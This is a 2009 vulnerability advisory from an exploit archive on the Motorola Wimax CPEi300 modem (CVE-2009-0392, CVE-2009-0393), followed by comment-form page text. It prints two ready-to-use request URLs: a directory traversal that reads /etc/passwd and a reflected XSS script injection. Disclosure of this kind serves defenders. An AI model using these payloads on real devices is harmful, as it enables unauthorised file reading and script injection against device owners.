Motorola Wimax Modem CPEi300 Multiple Vulnerabilities

2009.01.30

Credit: Usman Saeed

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-0392 | CVE-2009-0393

CWE: CWE-22

Regards !
#####################################################################################
#
# Name : Motorola Wimax modem CPEi300 Multiple Vulnerabilities
# Author : Usman Saeed
# Company : Xc0re Security Reasearch Group
# Homepage : http://www.xc0re.net
#
#####################################################################################
[Note: User needs to logged in! ]
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Exploitation :
[+] Directory traversal
http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs
[+] XSS
http://Hostname/cgi-bin/sysconf.cgi?page="><script>alert(1);</script>"&action=request&sid=AeoFSFoI4lDs

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Motorola Wimax Modem CPEi300 Multiple Vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.